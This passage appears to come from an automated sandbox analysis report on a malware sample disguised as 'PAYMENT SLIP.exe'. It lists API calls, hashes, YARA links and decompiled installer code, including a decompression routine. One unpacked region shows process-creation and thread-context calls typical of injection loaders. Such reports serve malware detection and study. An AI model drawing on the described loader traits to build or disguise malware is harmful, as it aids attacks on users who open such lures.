                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll$KXCJDFJSKF
              • API String ID: 1941528284-3723141028
              • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
              • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B10950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00B10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00B10C1F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: d73710b16fe3c6f4adec07d48eb8453be88729f5cb2ed52d118104664f8f251d
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: 2BA1DF34D14209EFDF10EFE4C985BEDBBB1EF08315F60849AE611BA2A0D7B55A91DB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004068C1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004068C1(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








              0x004068d8
              0x004068e1
              0x004068e3
              0x004068e3
              0x004068e7
              0x004068fa
              0x004068f4
              0x004068f4
              0x004068f4
              0x00406913
              0x00406927
              0x0040692e

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
              • wsprintfW.USER32 ref: 00406913
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B11A70, Relevance: 9.1, APIs: 6, Instructions: 118fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B11BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 00B11B25
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: fc3f6b91006cef5fd6150284444b9a0b1592fba10deb8b245bf94757e2dccfd7
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: 3B410630D44209FEEF11AFA4CC46BEEBAB1EF18312F6048A4F611B50A0E7714A91EF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405A73, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405A73(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







              0x00405a7e
              0x00405a82
              0x00405a85
              0x00405a8b
              0x00405a8f
              0x00405a93
              0x00405a9b
              0x00405aa2
              0x00405aa8
              0x00405aaf
              0x00405ab6
              0x00405abe
              0x00405ac0
              0x00000000
              0x00405ac0
              0x00405aca
              0x00405ad1
              0x00405ae7
              0x00000000
              0x00000000
              0x00000000
              0x00405ae9
              0x00405aed

              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • GetLastError.KERNEL32 ref: 00405ACA
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
              • GetLastError.KERNEL32 ref: 00405AE9
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 3449924974-3081826266
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406061, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












              0x00406067
              0x0040606d
              0x0040606e
              0x0040606e
              0x00406073
              0x00406074
              0x00406077
              0x0040607c
              0x0040607f
              0x00406089
              0x00406096
              0x0040609a
              0x004060a2
              0x00000000
              0x00000000
              0x004060a6
              0x00000000
              0x004060a8
              0x004060a8
              0x004060a8
              0x004060ab
              0x004060ae
              0x004060ae
              0x004060b1
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 0040607F
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
              • nsa, xrefs: 0040606E
              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 00406061
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-3198988653
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B10034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 00B105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 00B105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B10605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00B1091F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: c97396c2e9f7d9c14470ff56f23be2ff145c3b7f08fd3f1ed60ac0bf72dceb36
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: FD523935A50258EAEB60DBA4EC55BFDB7B5EF48700F604496E608EA2A1D3B05EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407090, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
              Download Yara Rule
              C-Code - Quality: 99%
              			E00407090() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
